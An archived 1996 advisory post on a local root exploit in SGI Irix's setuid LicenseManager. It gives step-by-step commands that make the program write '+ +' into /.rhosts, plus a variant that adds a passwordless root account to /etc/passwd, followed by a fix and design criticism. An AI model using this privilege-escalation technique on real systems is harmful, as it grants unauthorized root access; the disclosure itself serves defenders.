TUCoPS :: SGI :: irix_lic.txt

Irix root exploit for Licencemanager


                     Irix: root exploit for LicenseManager
                                       
   Yuri Volobuev (volobuev@t1.chem.umn.edu)
   Tue, 19 Nov 1996 13:30:19 -0600
   
Hi there,

For your convenience, a new, fast, reliable way to get root on your local
SGI is given below.  It works on Irix 5.3 and 6.x with
license_eoe.sw.license_eoe installed, which I believe is default (I found it
installed on several independent Irix installations).  5.2 doesn't seem to
have it.

This exploit was made possible by developers who make big, fat programs like
LicenseManager suid.

Short background:  LicenseManager is GUI to license subsystem.  It allows
to install/remove/update FLEXlm and NET_LS licenses.  Any regular user with
access to X screen can run it, and it's suid.  It will allow anyone to
install licenses, and will prompt for root password if one wants to remove
one.  And that's about all protection it has.

% setenv NETLS_LICENSE_FILE /.rhosts
% /usr/etc/LicenseManager &

Install...
NetLS Node-locked
Vendor Name: whatever
Vendor ID: + +
Product name: whatever
License version: 1.000
License version:
Expiration date: 01-jan-0

(in license version field I put space)

Apply

License(s) succesfully installed

% cat /.rhosts
#:# "whatever" "whatever" "1.000" "Incomplete"
+ +

If your system has remote root logins disabled, replacing /.rhosts with
/etc/passwd and + + with toor:0:0::/:/bin/sh will be helpful.

How to fix:

chmod -s /usr/etc/LicenseManager

Comments:

This whole thing makes me feel bad.  There are genuine exploits, there are
smart ones and lame ones.  This one is superlame.  Hacking suid program like
LicenseManager is like stealing a milk bottle from a newborn, while baby's
sleeping, parents are out of town and babysitter's in the bathroom.

It is extremely well known that suid programs are very dangerous.  It
doesn't take a lot of knowledge to figure that suid program that big is
vulnerable in zillion ways (and it is, I've just shown one of many).  It's
just not suitable to be suid because it does no sanity checks whatsoever.
So why is it suid?  Somebody wanted to make Irix GUI more user-friendly.
Really, why not allow people to install licenses without bothering to su
first?  Alas, this is a clear case where security is sacrified in favor of
(very questionable) ease of use.  With all due disrespect, even Microsoft
doesn't do things like that so easily.

I notified SGI, but haven't heard back from them.

have fun,

yuri

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH